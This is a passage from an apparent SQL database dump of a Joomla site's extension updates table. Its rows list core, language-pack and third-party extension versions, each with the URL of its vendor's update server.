Latin','','pkg_sr-YU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(26566,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(26567,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(26568,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(26569,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(26570,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(26571,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(26572,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(26573,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(26574,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(26575,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(26576,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(26577,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(26578,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(26579,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(26580,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(26581,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(26582,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.1.1','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeeba.com/download/fef/1-1-1.html',''),(26583,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.3FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer/features',''),(26584,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.7.1','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeeba.com/download/fof3/3-7-1.html',''),(26585,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26586,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26587,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26588,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(26589,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(26590,3,0,'French','','pkg_fr-FR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(26591,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(26592,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(26593,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(26594,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(26595,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(26596,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(26597,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(26598,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(26599,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(26600,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.22.2','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(26601,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(26602,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(26603,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(26604,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(26605,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(26606,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(26607,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(26608,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(26609,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(26610,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(26611,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(26612,3,0,'English US','','pkg_en-US','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(26613,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(26614,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(26615,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(26616,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(26617,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(26618,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(26619,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(26620,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(26621,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(26622,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(26623,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(26624,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(26625,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(26626,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(26627,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(26628,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(26629,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(26630,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(26631,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(26632,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(26633,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(26634,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(26635,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(26636,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(26637,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(26638,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(26639,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(26640,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(26641,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(26642,20,0,'RokGallery','','','component','',0,'2.46','0802','http://updates.rockettheme.com/joomla/313/1985305838','',''),(26643,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(26644,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(26645,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(26646,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(26647,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(26648,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(26649,57,0,'French','','pkg_fr-FR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(26650,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(26651,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(26652,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(26653,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(26654,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(26655,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(26656,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(26657,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(26658,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(26659,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.22.2','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(26660,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(26661,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(26662,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(26663,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(26664,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(26665,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(26666,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(26667,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(26668,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(26669,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(26670,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(26671,57,0,'English US','','pkg_en-US','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(26672,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(26673,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(26674,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(26675,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(26676,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(26677,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(26678,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(26679,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(26680,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(26681,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(26682,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(26683,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(26684,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(26685,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(26686,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(26687,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(26688,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(26689,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(26690,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(26691,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(26692,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(26693,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(26694,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(26695,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(26696,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-1.html',''),(26697,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.1.1','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeeba.com/download/fef/1-1-1.html',''),(26698,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.3FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer/features',''),(26699,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.7.1','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeeba.com/download/fof3/3-7-1.html',''),(26700,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26701,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26702,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26703,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-1.html',''),(26704,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26705,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26706,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26707,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-1.html',''),(26708,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26709,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26710,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26711,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26712,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-1.html',''),(26713,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26714,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26715,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26716,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-1.html',''),(26717,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26718,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26719,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26720,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26721,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-1.html',''),(26722,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26723,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26724,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-1.html',''),(26725,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26726,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26727,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26728,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26729,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-1.html',''),(26730,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26731,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26732,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(26733,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(26734,3,0,'French','','pkg_fr-FR','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(26735,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(26736,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(26737,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(26738,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(26739,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(26740,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(26741,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(26742,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(26743,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(26744,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(26745,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(26746,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(26747,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(26748,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(26749,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(26750,3,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'3.9.24.2','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(26751,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(26752,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(26753,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(26754,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(26755,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(26756,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(26757,3,0,'English US','','pkg_en-US','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(26758,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(26759,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(26760,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(26761,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(26762,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(26763,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(26764,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(26765,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(26766,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(26767,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(26768,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(26769,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(26770,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(26771,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(26772,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(26773,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(26774,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(26775,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(26776,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(26777,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(26778,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(26779,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(26780,3,0,'English 